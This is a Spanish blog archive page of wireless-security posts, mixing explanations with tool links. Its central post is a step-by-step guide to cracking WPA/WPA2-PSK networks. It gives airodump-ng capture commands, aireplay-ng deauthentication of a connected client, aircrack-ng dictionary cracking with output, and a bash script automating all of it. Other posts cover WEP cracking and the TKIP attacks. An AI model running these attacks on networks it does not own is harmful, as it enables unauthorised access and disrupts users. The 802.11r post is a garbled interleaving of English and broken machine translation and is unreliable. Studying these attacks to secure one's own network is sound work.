Mostrando las entradas con la etiqueta INALAMBRICO. Mostrar todas las entradas
Mostrando las entradas con la etiqueta INALAMBRICO. Mostrar todas las entradas

lunes, 5 de abril de 2010

Descarga y tutorial de BackTrack 4 Final



La distribución por excelencia para la auditoria de seguridad ya tiene nueva versión, se trata de BackTrack 4 corrigiendo los errores y problemas que se fueron reportando en versiones anteriores, viene con el núcleo actualizado con la versión 2.6.30.9 más de 300 herramientas muchas de ellas no venían en versiones anteriores y un soporte mucho mayor para el hardware especialmente para las tarjetas inalámbricas.

Los desarrolladores han dicho que esta era la mejor de las distribuciones con diferencia después de 18 meses de trabajo. Se puede instalar en el disco duro, aunque es una distribución que mucha gente tan solo la quiere en LiveCD ya que solo la usa en momentos puntuales como puede ser para la auditoría de redes inalámbricas, de hecho muchos únicamente conocen AirCrack-ng pero hay que decir que esta distribución tiene mucho más.

 Descarga Backtrack 4.


domingo, 7 de marzo de 2010

Un nuevo ataque a WPA/TKIP


Desde que a primeros de noviembre de 2008, Erik Tews y Martin Beck abrieran la caja de Pandora demostrando la viabilidad de capturar información enviada desde un router protegido con WPA/TKIP, se han ido sucediendo pequeños avances en las técnicas utilizadas en dichos ataques yendo desde la inyección de un mayor número de paquetes maliciosos (tal y como se demostró en un paper publicado por unos estudiantes de la universidad de ciencia y tecnología de Noruega en la NorSec Conference celebrada a mediados de octubre de 2009) hasta el último ataque conocido en el que, Matin Beck, vuelve a la carga con un nuevo ataque (PDF) que, gracias a un refinamiento de la técnica utilizada, permite inyectar no solamente un mayor número de paquetes, sino que estos, pueden contener más información.

Haciendo memoria

Recordemos que, TKIP (Temporary Key Integrity Protocol), es una variante de WEP. El hecho de que inicialmente WPA utilizara este sistema -frente al más seguro AES- se debe, simplemente, a una cuestión económica.

En la mayoría de los casos, un router que soportase el protocolo WEP podría ser actualizado por software para soportar el protocolo WPA/TKIP pero, probablemente no a WPA/AES pues, este último, es computacionalmente más exigente que el primero y, por tanto, sería necesario una actualización del hardware -normalmente mediante un cambio de router- con el coste que ello implicaría.

De todas formas, TKIP si que supone un pequeño avance frente a WEP pues, aparte del vector de inicialización del paquete presente en el protocolo WEP (los conocidos como IVs), se utiliza una clave de sesión que, convenientemente "mezclada" con el vector mencionado anteriormente, impide utilizar los ataques conocidos en la actualidad para WEP ya que cada uno de los bytes de un paquete, depende tanto del vector de inicialización como de la clave de sesión. Además de esto -y para evitar ataques basados en la fragilidad de la protección por CRC32 utilizado en WEP-, TKIP implementa dos medidas adicionales: un Message Integrity Check (MIC) de 64 bits incluido en cada paquete a transmitir conocido como "MICHAEL", y un contador de secuencia (TSC) diseñado para asegurar el orden de recepción de los paquetes.

La propuesta inicial de Erik y Martin se basaba en utilizar una variante del ataque Chopchop que describimos en su forma original (orientado al ataque de redes cifradas con WEP) a continuación:

El ataque Chopchop original

Este procedimiento permite a un atacante descifrar los últimos n bytes de información de un paquete mediante el envío de una media de n * 128 paquetes al punto de acceso. La idea se basa en lo siguiente:

En redes protegidas con el protocolo WEP, antes de ser cifrados, los paquetes son modificados de tal forma que se añade un CRC32 conocido como ICV al final del contenido del paquete. A pesar del cifrado posterior, es posible averiguar el valor del último byte de datos del paquete eliminando dicho byte del paquete (truncando el paquete) utilizando una característica presente en la mayoría de los puntos de acceso: si reciben un paquete correcto de un cliente no autenticado, el punto de acceso genera un error, pero, si reciben un paquete con un checksum incorrecto, ese paquete es, sencillamente, descartado. Dado que se ha eliminado un byte basta con mandar a lo sumo 256 paquetes (de media, 128) para averiguar el valor del byte elminado. Una vez conocido el valor del último byte de datos se puede realizar la misma operación con bytes precedentes tantas veces como bytes queramos descifrar.

Contramedidas implementadas en WPA/TKIP

Como se ha comentado anteriormente, TKIP implementa dos contramedidas para evitar ataques como el descrito arriba:

* Si se recibe un paquete con un ICV erroneo, se asume que se ha producido un error en la transmisión y el paquete es descartado. Si, por contra, el ICV es correcto -pero la verificación del MIC fallase-, se consideraría que se está produciendo un ataque y, el punto de acceso, respondería enviando un MIC failure report frame. Si se producen más de dos errores en la validación del MIC en un intervalo de menos de 60 segundos se corta la comunicación y se renegocian todas las claves tras un periodo de penalización de 60 segundos.

* Si un paquete es recibido correctamente -su ICV y su MIC son correctos- se actualizará el contador TSC incrementándose en una unidad. En caso de que el TSC fuese inferior al valor del contador (el paquete habría sido recibido en un orden incorrecto), este sería descartado sin mayores consecuencias.

A pesar de todas estas contramedidas el uso del ataque Chopchop sique siendo viable con TKIP simpre y cuando se haga teniendo cuidado de no "disparar las alarmas".

La cuestión es ¿qué ganamos consiguiendo averiguar los últimos bytes de un paquete cifrado?. En principio podría parecer que la información obtenida es tan pequeña que no tiene ninguna utilidad práctica, sin embargo, pronto veremos que esto no es así.

Atacando WPA

Para empezar, es necesario que el router en el que se ejecute el ataque tenga habilitado QoS de forma que existan varios canales (según la especificación, ocho) por los que transmitir pues, dado que cada canal tiene un contador distinto para el TSC -y el tráfico normalmente siempre circula por el canal 0-, es posible inyectar paquetes con TSCs "bajos" por los siete canales normalmente inactivos sin "levantar sospechas". Es posible por tanto enviar paquetes modificados a aquellos canales con un contador TSC bajo teniendo cuidado, eso si, de no enviar más de dos paquetes con un MIC incorrecto en el intervalo de un minuto.

Supongamos que nos enfrentamos con una red Wi-Fi protegida con WPA/TKIP y que utiliza IPv4 y de la que conocemos el rango de direcciones utilizado (p. ej. 192.168.1.0/24). Adicionalmente, y como hemos visto anteriormente, el router deberá tener activado el QoS y el periodo de regeneración de las claves de la red deberá ser alto (p. ej. 3600 segundos).

Dado este escenario (bastante realista para muchas de las redes desplegadas actualmente), para atacar dicha red sería necesario capturar tráfico hasta detectar un paquete ARP (facilmente distinguible del resto en base a su longitud característica).

Haciendo un inciso -y aunque no es importante para explicar el ataque- es interesante señalar que, en una red Wi-Fi, aunque la comunicación esté cifrada, las direciones MAC tanto origen como destino aparecen en claro y los paquetes son enviados siempre a la dirección de broadcast de la red.

En un escenario como el descrito, se conoce la práctica totalidad del contenido de un paquete ARP, quedando por averiguar el último byte de las direcciónes IP origen y destino, los 8 bytes del MIC y los 4 del checksum ICV. El MIC y el ICV conforman, por tanto, los últimos 12 bytes del paquete.

Teniendo en cuenta que no podemos mandar más de dos paquetes con un MIC incorrecto en el intervalo de un minuto -aunque si que podemos mandar tantos paquetes con un ICV incorrecto como queramos hasta "acertar" pues, siendo incorrectos, serán descartados sin más (sin alterar el valor del TSC del canal) necesitaremos alrededor de 12 minutos para averiguar los 12 bytes que conforman el MIC y el ICV y un par más si queremos averiguar también las direcciones origen y destino del paquete.

Una vez recuperado el MIC y el ICV de un paquete, el atacante puede recuperar la clave utilizada para generar el MIC de dicho paquete -el algoritmo MICHAEL no fue diseñado para ser una función de un solo sentido y es igual de eficiente ejecutarlo "hacia atrás" que "hacia delante"- y, desde ese momento, hasta la resincronización de claves, pueden generarse paquetes "firmados" con la clave MIC obtenida y cuyos 4 bytes ICV correctos podrán averiguarse mediante un ataque Chopchop.

En esta forma, el ataque únicamente permite el envío de tráfico que pueda hacer saltar IDSs que trabajen a nivel de IP o, si el usuario está conectado a Internet, se podría provocar la fuga de información rutando tráfico hacia una máquina externa mediante respuestas ARP falsas.

Por último, a pesar de que con este ataque no es posible descifrar los paquetes de respuesta del cliente transmitidos via Wi-Fi, sería posible obtener dichos paquetes a través de la conexión a Internet mediante la técnica de ARP spoofing descrita anteriormente.

Mejoras introducidas en el nuevo ataque

Una vez aclarado el funcionamiento del ataque original a WPA veremos las novedades aportadas por el nuevo ataque.

La principal mejora es el aumento significativo de información que es posible inyectar en la red pues, con el ataque anterior, en la práctica solamente era posible enviar 28 bytes de información por cada paquete descifrado.

La idea en la que se basa esta mejora es la de la fragmentación de paquetes. La especificación 802.11 permite fragmentar un paquete hasta en 16 partes, sin embargo, TKIP impide reutilizar el keystream de un vector de inicialización dado en más de un fragmento, por lo que es necesario disponer de al menos 16 keystreams distintos para poder transmitir estos. Dado que el ataque explicado anteriormente precisa de 15 minutos para obtener un paquete ARP completo no sería viable utilizar dicho método para llevar a la práctica nuestra idea.

Con el fin de conseguir nuevos keystreams debemos forzar la generación de nuevos paquetes en la red de los cuales conozcamos la mayor cantidad de información. Los paquetes perfectos para esto son los TCP-SYN que, enviados mediante IP spoofing -haciéndonos pasar por el punto de acceso- a un puerto TCP abierto en el cliente, provocarán la respuesta TCP-SYN/ACK a la que el propio punto de acceso, responderá con un paquete TCP-RST generando un nuevo IV dirigido hacia el cliente y que podremos capturar.

Para llevar a cabo esta idea debemos ser capaces de generar un paquete TCP/IP que consistirá en: 8 bytes de cabecera LLC, 20 bytes de cabecera IP y otros 20 de cabecera TCP lo cual nos da 48 bytes de longitud para la MSDU y, a esto, hay que añadirle los 8 bytes del MIC que hacen en total 56 bytes. Asumiendo que disponemos de 8 bytes de keystream para cifrar información, utilizando los siete canales restantes (proporcionados por el QoS del punto de acceso) seremos capaces de cifrar 7 x 8 = 56 bytes por lo que, dado que el envió de un TCP-SYN genera un único TCP-RST, con este método nunca podríamos obtener nuevos bytes de keystream "utilizables".

Necesitamos, por tanto, encontrar una forma de conseguir un mayor número de bytes de keystream que nos permitan inyectar tráfico extra en la red.

Casualmente, muchos sistemas Linux -como los que usan una gran cantidad de routers ADSL- generan paquetes TCP-RST con valores concretos en ciertos campos que nos permitirían obtener un mayor número de bytes de keystream a partir de los paquetes TCP-RST capturados.

Por ejemplo, el ID de dichos paquetes suele ser 0 -por lo que se obtendrían dos bytes extra- de los dos siguientes campos, el byte en el que se indica la fragmentación sería también cero -al no haber más fragmentos- y el de los flags sería, o bien cero, o 0x40 para indicar que no se debe fragmentar el paquete; el siguiente byte -el TTL- probablemente será 0x40 pues es el valor utilizado por defecto en Linux; así mismo, el byte para indicar el protocolo será 0x06 indicando que se usa TCP, las IPs de origen y destino y los puertos TCP serán conocidos así como el número de secuencia que será igual al original incrementado en uno, ...

Siguiendo de forma similar con el resto de los campos del paquete podríamos llegar a obtener hasta 60 bytes de keystream por cada uno de los siete canales libres sin necesidad de fragmentación.

Suponiendo que podamos conseguir todos los requisitos expuestos anteriormente, seríamos capaces de generar 60 nuevos bytes de keystream a la velocidad de la conexión wireless. Incluso, en caso de que el punto de acceso no cumpliese con estos requisitos, si la red a atacar tuviese conexión a Internet y no estuviese filtrado el establecimiento de conexiónes hacia máquinas de Internet, sería viable hacer spoofing de una IP de un sistema externo en el cual tuviésemos control de los paquetes TCP-RST generados lo cual permitiría generar nuevos bytes de keystream aunque, eso sí, la velocidad de generación quedaría limitada a la velocidad de descarga de dicha conexión.


Conclusiones

En resumen, y como se ha comentado inicialmente, este ataque permitiría extraer mucha más información de una red protegida con WPA/TKIP consituyendo un serio problema de seguridad en cuanto a la fuga de datos que ello supone.

Aunque en la práctica este ataque es complejo dado que se necesita la confluencia de un gran número de factores -la red debe estar cifrada con WPA/TKIP que poco a poco va cayendo en desuso, el atacante debe estar a una distancia que le permita inyectar paquetes y el punto de acceso debe tener activado QoS y estar basado en Linux- La forma de evitar este problema es tan simple como utilizar WPA/AES a la hora de configurar una red Wi-Fi.

Dejamos para una futura entrada el analizar el otro avance presentado que, en resumen, es un ataque al código de integridad del mensaje (MICHAEL) que permitiría insertar información en un paquete con datos y MIC desconocidos consiguendo con ello el objetivo de poder descifrar todo el tráfico dirigido hacia el cliente.

Fernando Braquehais
S21sec. e-crime
http://blog.s21sec.com/2010/03/un-nu...Blog+S21sec%29

martes, 10 de marzo de 2009

Paper externo - Cracking WPA/WPA2-PSK with wordlist

-[ INFORMACIÓN ]---------------------------------------------------------------------

Titulo: Cracking WPA/WPA2-PSK with wordlist
Autor: ka0x
Contacto: ka0x01[alt+64]gmail.com
Fecha: 08/03/2009

---------------------------------------------------------------------------------


-[ ÍNDICE ]---------------------------------------------------------------------

0x01: Introducción
0x02: ¿Qué es el handshake?
0x03: Capturando handshake
0x04: Conseguir clave con diccionario
0x05: airoWPA-PSK.sh
0x06: Fin

---------------------------------------------------------------------------------


---[ 0x01: Introduction ]

En este pequeño texto se explicará como obtener la clave de una red inalámbrica con cifrado WPA/WP2
en la que se esté usando un sistema de clave compartida (pre-shared keys - PSK).
Para todo esto necesitaremos capturar un handshake y después con un diccionario atacar al handshake
para obtener la clave.

Imaginemos que en este caso tenemos la siguiente red inalambrica:

- ESSID: ap_labs
- BSSID: 00:1B:02:93:AF:9C
- CANAL: 1
- CLIENTE: 01:C2:B3:04:02:05


---[ 0x02: ¿Qué es el handshake? ]

Pues el handshake se genera cuando un cliente se asocia a la red inalámbrica.
Es como un saludo (apretón de manos) entre el punto de acceso y el cliente.
Son los paquetes que se envían entre el AP y el cliente en el momento de la asociación,
para que podamos empezar el ataque con diccionario en una red con cifrado WPA-PSK, necesitaremos haber
capturado estos paquetes.

---------------------------------------------------------------------------------



---[ 0x03: Capturando handshake ]

Bueno empecemos...
Como dije, íbamos a utilizar la suite de aircrack-ng, si queremos los sources y demás
podemos entrar a su web: http://www.aircrack-ng.org/doku.php#download

Si utilizamos debian, encontraremos el paquete en los repositorios, instalar:
# apt-get install aircrack-ng

Para poder capturar paquetes, tendremos que poner nuestro adaptador wireles en modo monitor:

# airmon-ng start
p.e: # airmon-ng start wlan0


Siempre se necesitará tener un cliente 'real' asociado en el AP.
Entonces una vez para empezar a capturar paquetes, utilizaremos airodump-ng:

# airodump-ng --bssid 00:1B:02:93:AF:9C -c 1 -w redWPA wlan0
--bssid -> MAC del punto de acceso.
-w redWPA -> guardará los datos obtenidos en el archivo "redWPA".
-c -> Canal del punto de acesso
wlan0 -> interfaz adaptador inalambrico.

Así capturaremos todo lo que pase por el punto de acceso con MAC: 00:1B:02:93:AF:9C
Entonces vayamos a capturar el handshake...


Como habíamos dicho antes el handshake se genera en el momento que un cliente se asocia al AP.
Entonces, cómo hacemos que se vuelva asociar el cliente al AP?

Facil, desautenticaremos al cliente del AP y esperamos a que se vuelva asociar,
para este proceso usaremos el ataque 0 de aireplay-ng. Este ataque enviará al cliente paquetes de
desautenticacion

Uso:
# aireplay-ng -0 5 -a -c
|-> Numero de desautenticaciones que se enviarán.
Si ponemos un 0, enviará desautenticaciones hasta que lo paremos.

En este caso:
# aireplay-ng -0 15 -a 00:1B:02:93:AF:9C -c 01:C2:B3:04:02:05 wlan0

Cuando ejecutemos esto segun el numero de desautenticaciones nos aparecerá algo así:
Sending DeAuth to station -- STMAC: [01:C2:B3:04:02:05]

En el momento que el cliente se desasocie y se vuelva a asociar al AP, nosotros con el airodump-ng
capturaremos el handshake.

¿Cómo sabemos que ya lo hemos capturado?

Pues en la ventana donde tenemos corriendo el airodump-ng, arriba a la derecha, veremos algo así:
CH 1 ] [ Elapsed: 14 mins ][ 2009-03-08 ][ WPA handshake: 00:1B:02:93:AF:9C

Una vez que nos aparezca eso, ya podemos cerrar todo, en el archivo redWPA-01.cap ya tendremos
el dichoso handshake =)

---------------------------------------------------------------------------------


---[ 0x04: Conseguir clave con diccionario ]


Una vez teniendo el handshake, ya podemos utilizar un diccionario de posibles claves
para que aircrack-ng compruebe haber si alguna de las claves del diccionario coincide
con la del AP.

¿Qué diccionario usar? pues el de john the ripper, alguno propio, hay muchos...
aunque se supone que esto es para comprobar la seguridad de tu red wireless y ya te tendrás
que saber de sobra tu clave.

La clave pre-compartida puede tener un tamaño de 8 a 63 caracteres.

Empecemos...

Si ejecutamos:
# aircrack-ng redWPA-01.cap

Podremos ver que tenemos un handshake:

---------
Opening wpa-hand.cap
Read 553 packets.

# BSSID ESSID Encryption

1 00:1B:02:93:AF:9C ap_labs WPA (1 handshake) <------ Choosing first network as target. Opening wpa-hand.cap Please specify a dictionary (option -w). Quitting aircrack-ng... --------- Uso de aircrack-ng con diccionario: # aircrack-ng -w


Suponiendo que nuestro archivo de datos capturados donde se encuentra el handshake se llama
redWPA-01.cap, lo ejecutaremos de la siguiente forma:


# aircrack-ng -w diccionario.lst redWPA-01.cap

Entonces aquí ya aircrack-ng se pondrá a comprobar las posibles claves del diccionario hasta obtenerla.
Una vez obtenida, nos aparecerá lo siguiente:

---------

Aircrack-ng 1.0 rc1


[00:00:00] 0 keys tested (0.00 k/s)


KEY FOUND! [ clave__ap ]


Master Key : 18 D4 E8 70 A0 B5 D2 26 4C 61 BA 85 5F 36 8F D9
DA 56 2A D2 51 B6 01 B6 A9 E8 61 B3 CD 92 7D 09

Transcient Key : DA 5E 56 09 35 9E 2D 9F 35 B0 C5 9E A9 41 71 B5
8A 8C B6 1B B5 A0 D2 C0 53 47 C6 05 CC 2C CA C0
C7 41 04 B2 F5 7D 44 DF 71 C5 11 78 5D DE A1 D0
F9 2E BE 54 22 46 82 24 35 91 7E 93 21 9D BF 78

EAPOL HMAC : 6A 31 F7 C0 C8 A7 83 37 50 FD 44 C3 8C 7D 2B 26

---------

Hay ya vemos que encontro la clave y que es 'clave__ap'.
Como vemos el proceso de obtener una clave WPA/WPA2-PSK no es tan dificil siempre y cuando
sepamos nuestra clave, ya que si no la sabríamos este proceso podría durar horas, dias e incluso !!semanas!!

---------------------------------------------------------------------------------



---[ 0x05: airoWPA-PSH.sh ]

Para simplificar un poco este proceso de obtención de la clave, hice un pequeño script en bash
sencillo que te puede servir si eres un poco vago :P

<-----------------airoWPA-PSK.sh--------------------->
#!/bin/bash

# airoWPA-PSK.sh v0.1
# written by ka0x

if [ $UID != 0 ]; then
echo "[!] NECESITAS EJECUTAR EL SCRIPT $0 CON PRIVILEJIOS DE SUPERUSUARIO"
exit
fi

comprueba_mac(){
if [ ! "${#1}" -eq "17" ]; then
echo -e "\033[31mMac Incorrecta\n\033[0m"
exit
fi
}
interfaces() {
echo -e "\n\033[31m[*] Seleccione la interfaz que va a utilizar: \033[0m\n"
INTERFACES=$(iwconfig | grep ESSID | awk '{ print $1 }')
select INTER in $INTERFACES; do
break;
done
clear
}

monitor(){
airmon-ng start $INTER
clear
menu
}

handshake(){
clear
read -p "[-] Introduzca la MAC del AP: " mac_ap
comprueba_mac $mac_ap
read -p "[-] Introduzca la MAC del Cliente: " mac_client
comprueba_mac $mac_client
read -p "[-] Introduzca el canal del AP: " mac_chanel
read -p "[-] Nombre de archivo donde se guardaran los datos capturados: " datas
xterm -hold -title "Obteniendo Handshake en $mac_ap" -geometry 96x60+0+0 -bg "#000000" -fg "#FFFFFF" -e airodump-ng --bssid $mac_ap -c $mac_chanel -w $datas $INTER && clear && menu
}

desautenticacion(){
clear
read -p "[-] Introduzca la MAC del AP: " mac_ap
comprueba_mac $mac_ap
read -p "[-] Introduzca la MAC del cliente asociado: " mac_cliente
comprueba_mac $mac_cliente
read -p "[-] Introduzca el numero de desautenticaciones: " num
xterm -hold -geometry 70x25-0+0 -bg "#000000" -fg "#99CCFF" -title "Desautenticando $mac_cliente del AP $mac_ap $num veces" -e aireplay-ng -0 $num -a $mac_ap -c $mac_cliente $INTER
clear
menu
}

crack_dicc(){
clear
read -p "[-] Introduzca la ruta del diccionario: " diccionario
echo "[-] Seleccione el archivo de datos capturados:"

LS_DIR=$(ls *.cap)
select DATA in $LS_DIR; do
break;
done

xterm -hold -geometry 70x25-0+0 -bg "#000000" -fg "#99CCFF" -title "Obteniendo clave con diccionario: $diccionario" -hold -e aircrack-ng -w $diccionario $DATA
menu
}

menu(){
echo -e "\n[*] Opciones:\n"
echo -e "\033[31m-=-=-=-=-=-=-=-=-=-=-=-=-\033[0m"
echo "1 - Activar Modo Monitor"
echo "2 - Capturar handshake"
echo "3 - Desautenticar cliente"
echo "4 - Fuerza bruta con diccionario a handshake"
echo "5 - Salir"
echo -e "\033[31m-=-=-=-=-=-=-=-=-=-=-=-=-\n\033[0m"

read -p "opcion> " OPCION

case $OPCION in
"1") monitor;;
"2") handshake;;
"3") desautenticacion;;
"4") crack_dicc;;
"5") exit;;
*) echo -e "\033[31m[!] OPCION NO VALIDA\n\033[0m" && menu;;

esac
}

interfaces
menu

# __EOF__
<------------------------------------------------>

---------------------------------------------------------------------------------


---[ 0x06: Fin ]

Bueno pues eso es todo, los pasos son bastantes sencillos, cualquier duda pueden
entrar a la web de aircrack-ng (http//www.aircrack-ng.org) donde podrán encontrar abundante documentación
o mismamente enviándome un email.


Espero que haya quedado bastante claro.

Un saludo!

# ka0x

---------------------------------------------------------------------------------

__EOF__


Via http://packetstormsecurity.org/papers/wireless/wpawpa2-crack.txt

viernes, 30 de enero de 2009

Apagar correctamente wifislax y extraer el cd

Para wifislax 3.1, si queremos apagar correctamente y que extraiga el cd:

Código:
eject & poweroff -f

Aunque deberia valer para cualquier livecd del mundo mundial

tambien:

Código:
eject | poweroff

si estamos fuera del entorno Xwindows pues la tecla & se consigue con shift(mayusculas) + 7

--------------------------

Probar tambien fuera del entorno grafico:
Código:
poweroff -f & eject

la tecla & se consigue con shift(mayusculas) + 7

Via seguridadwireless

Descarga directa de Wifislax 3.1 o Backtrack 3,

WIFISLAX

Wifislax versión 3.1 (683MB)

http://download.wifislax.com:8080/wifislax-3.1.iso

ftp://files.tuto-fr.com:8080/distro/wifislax-3.1.iso

http://www.comprawifi-wifislax.com/public/wifislax/3.1/wifislax-3.1.iso

El md5 del fichero wifislax-3.1.iso es 911dc29262ee117e5e27770067bd2e71

Wifiway versión 1.0 Final

664.6 megas (MB)

Descarga 1 wifiway-1-final.iso -> http://download.wifislax.com:8080/wifiway-1-final.iso

The md5 of file wifiway-1.0-final.iso is 2fac135cad7b185706bbcb9c51f45932

BACKTRACK

Description: Imagen de cd
Name:: bt3-final.iso
Size: 695 MB
MD5: f79cbfbcd25147df32f5f6dfa287c2d9
SHA1: 471f0e41931366517ea8bffe910fb09a815e42c7
Download: http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-cd

Description: USB Version (Extended)
Name:: bt3final_usb.iso
Size: 784 MB
MD5: 5d27c768e9c2fef61bbc208c78dadf22
SHA1: 3aceedea0e8e70fff2e7f7a7f3039704014e980f
Download: http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-usb

Description: VMware Image
Name: BACKTRACK3_VMWare.rar
Size: 689 MB
MD5: 94212d3c24cf439644f158d90094ed6a
SHA1: 21c9a3f9658133efff259adbe290723583b4fd82
Download: http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-vm

Via:
http://www.wifislax.com/index.php
http://www.remote-exploit.org/backtrack.html

Nota legal: El uso de este software de análisis wireless debe ser una herramienta básica para profesionales y particulares que ansían conocer el nivel de seguridad de sus instalaciones inalámbricas, queda totalmente prohibido el uso de la misma para cometer actos delictivos de intrusión sobre las redes wireless de las cuales no somos propietarios o no tenemos los permisos pertinentes para analizar su nivel de seguridad. Es vuestra responsabilidad mantener la idea principal por la que se creo seguridad wireless y todo su entorno.

viernes, 29 de agosto de 2008

Nuevo estandar de redes inalámbricas 802.11r


IEEE 802.11r-2008 o rápida transición BSS (FT) es una modificación del IEEE 802,11 estándar para permitir la conectividad continua a bordo de dispositivos inalámbricos en movimiento, con rápida y segura handoffs de una estación base a otra de una gestión sin fisuras.

Justificación:

802,11, comúnmente conocida como Wi-Fi, se utiliza ampliamente para comunicaciones inalámbricas. Many deployed implementations have effective ranges of only a few hundred meters, so to maintain communications devices in motion that use it will need to handoff from one access point to another. Muchas implementaciones se han desplegado efectivos gamas de sólo unos pocos cientos de metros, a fin de mantener las comunicaciones en marcha los dispositivos que utilizan tendrá que handoff desde un punto de acceso a otro. In an automotive environment, this could easily result in a handoff every five to ten seconds. En un automóvil medio ambiente, esto podría fácilmente dar lugar a un handoff cada cinco a diez segundos.

Handoffs were already supported under the "a/h", "b" and "g" implementations, but only for data using IEEE 802.11f or Inter-Access Point Protocol (IAPP). Handoffs ya estaban apoyados en el marco del "a / h", "b" y "g" puestas en práctica, pero sólo para datos mediante IEEE 802.11f o Inter-Access Point Protocol (IAPP). However the handover delay of around 100 ms is too long to support applications like voice and video and is especially problematic for secure 802.11 connections using 802.1X or WPA/WPA2 which can take 2 to 8 seconds to negotiate [1] . Sin embargo, la entrega demora de alrededor de 100 ms es demasiado largo para apoyar aplicaciones como voz y vídeo y es especialmente problemático para garantizar 802,11 conexiones utilizando 802.1X o WPA/WPA2 que puede tomar de 2 a 8 segundos para negociar [1].

The primary application currently envisioned for the 802.11r standard is VOIP ("voice over IP", or Internet-based telephony) via mobile phones designed to work with wireless Internet networks, instead of (or in addition to) standard cellular networks. La principal aplicación actualmente previsto para el 802.11r estándar es VOIP (voz sobre IP ", o basados en Internet de telefonía) a través de teléfonos móviles diseñado para trabajar con redes inalámbricas de Internet, en lugar de (o además de) estándar de las redes celulares.

These wireless enabled mobile phones and PDAs must be able to rapidly disassociate from one access point and connect to another. Estas acceso inalámbrico a los teléfonos móviles y PDAs debe ser capaz de desvincularse rápidamente de un punto de acceso y conectar a otro. The delay that occurs during handoff cannot exceed about 50 msec, the interval that is detectable by the human ear. [2] However, current roaming delays in 802.11 networks average in the hundreds of milliseconds, even without security. [1] This can lead to transmission "hiccups," loss of connectivity and degradation of voice quality. El retraso que se produce durante el handoff no puede exceder de unos 50 mseg, el intervalo que sea detectable por el oído humano. [2] Sin embargo, las demoras actuales de itinerancia en redes de media 802,11 en los cientos de milisegundos, incluso sin la seguridad. [1] Esto puede llevar a la transmisión "hipo, la" pérdida de la conectividad y la degradación de la calidad de voz. Faster handoffs are essential for 802.11-based voice to become widely deployed. Handoffs más rápido son esenciales para 802.11 a base de voz para ser ampliamente desplegado.

Another problem with current 802.11 wireless gear is that a mobile device cannot know if necessary QoS resources are available at a new access point until after a transition. Otro problema con las actuales artes de pesca 802,11 inalámbrica que es un dispositivo móvil no puede saber si es necesario QoS recursos están disponibles en un nuevo punto de acceso hasta después de una transición. Thus, it is not possible to know whether a transition will lead to satisfactory application performance. Por lo tanto, no es posible saber si una transición dará lugar al ejercicio satisfactorio de rendimiento de las aplicaciones.
Rápida Transicion BSS

IEEE 802.11r especifica rápido básica Service Set (BSS), las transiciones entre los puntos de acceso en una forma perfecta. It refines the transition process of a mobile client as it moves between access points. Se refina el proceso de transición de un cliente móvil mientras se mueve entre los puntos de acceso. The protocol allows a wireless client to establish a security and QoS state at a new access point before making a transition, which leads to minimal connectivity loss of under 50 ms and application disruption. El protocolo permite a un cliente inalámbrico para establecer una seguridad y QoS estado en un nuevo punto de acceso antes de hacer una transición, lo que conduce a la pérdida de conexión mínima de menos de 50 ms y la aplicación interrupción. More importantly, the overall changes to the protocol do not introduce any new security vulnerabilities and preserves the behavior of legacy stations and access points. Más importante aún, los cambios globales en el protocolo de no introducir nuevas vulnerabilidades de seguridad y preserva el legado de comportamiento y las estaciones de puntos de acceso.

802.11r will govern the way roaming mobile clients communicate with candidate access points, establish security associations and reserve QoS resources. 802.11r, que regulará el modo de itinerancia móvil clientes comunicarse con los países candidatos los puntos de acceso, establecer asociaciones de seguridad y reserva de recursos QoS. Under 802.11r, clients can use the current access point as a conduit to other access points, allowing clients to minimize disruptions caused by changing channels. En virtud de 802.11r, los clientes pueden utilizar el actual punto de acceso como un conducto para otros puntos de acceso, permitiendo que los clientes para reducir al mínimo las interrupciones causadas por el cambio de canal. Until this is fully implemented, enterprises wishing to use VOIP over Wi-Fi will have to use proprietary solutions. Hasta que esto se aplique plenamente, las empresas que deseen utilizar VOIP más de Wi-Fi tendrá que utilizar soluciones propietarias.

sábado, 23 de agosto de 2008

WwW.TopMetroflog.cjb.net


El sitio donde están sólo los mejores metroflogs, hi5, spaces.
Apenas ayer terminé el sitio, y ya empezamos a tener usuarios interesados en conservar su foto en sl sitio. En este nuevo lugar, podrás votar por los flogs más populares de la web.
Ponte en contacto conmigo a través de mi flog y con gusto agrego tu metro. Estamos para servir.

Entra ya! www.topmetroflog.cjb.net
Vota por las fotos de las chicas más sexys, hermosas y guapas del metro.
Tenemos usuarios desde Culiacán hasta Argentina.

www.topmetroflog.cjb.net

Ya sabes, las chicas más guapas y sensuales de la red. Los chicos más prendidos del metro. Solo en Topmetroflog

miércoles, 2 de julio de 2008

Record mundial de Guitar Hero

Récord mundial de guitar hero, chequen este muchacho como mueve los dedos para jugar el popular juego de video. Obtenido desde youtube.

viernes, 6 de junio de 2008

Cómo usar aireplay-ng By Soporte (2 de 3) Desencriptar WEP



A continuación muestro cómo acelerar la captura de paquetes para el desencriptado de la clave WEP.
Antes de usar aireplay-ng(para acelerar) deben de tener activo airodump-ng(para capturar) que debe estar capturando todo el tráfico en un archivo .cap o .ivs.
Demostración de cómo desencriptar una contraseña de acceso a internet inalámbrico (TELMEX) bajo el cifrado WEP. La calidad del video es baja debido a que se tomó con una cámara fotográfica, pero el sonido es nitido. Para cualquier duda por favor visiten: http://alfonsocruz.blogspot.com y se harán todas las aclaraciones. Realizado por Alfonso Cruz (soporte) alumnos del INSTITUTO TECNOLÓGICO DE CULIACÁN. Como recomendación: eviten utilizar el cifrado WEP de 64 bits ya que con tan sólo 20 min aprox se puede encontrar la clave de la red. Recomiendo utilizar un cifrado más fuerte como WPA2/PSK (aunque proximamente haré la demostración para romper este cifrado).

--

Then I show how to accelerate the capture of packages for the decrypted of the WEP key.
Before using aireplay-ng (for accelerating) must have active airodump-ng (to capture) that should be capturing all traffic to a file. Or cap. IVs.
Demonstrating how to decrypt a password for access to wireless internet (TELMEX) under the WEP encryption. The video quality is low because it was taken with a camera, but the sound is crisp. For any questions please visit: http://alfonsocruz.blogspot.com and made all the clarifications. Produced by Alfonso Cruz (support) students of the Technological Institute of Culiacan. As recommendation: avoid using the 64-bit WEP encryption because with only about 20 minutes to find the key to the network. I recommend using a stronger encryption as WPA2/PSK (although I will soon demonstration to break this encryption).


Cómo usar aircrack-ng By Soporte (3 de 3) Desencriptar WEP





A continuación muestro cómo desencriptar la captura de paquetes WEP.
Para esto debemos tener archivos .cap o .ivs que fueron resultado de la captura con airodump-ng y aireplay-ng.
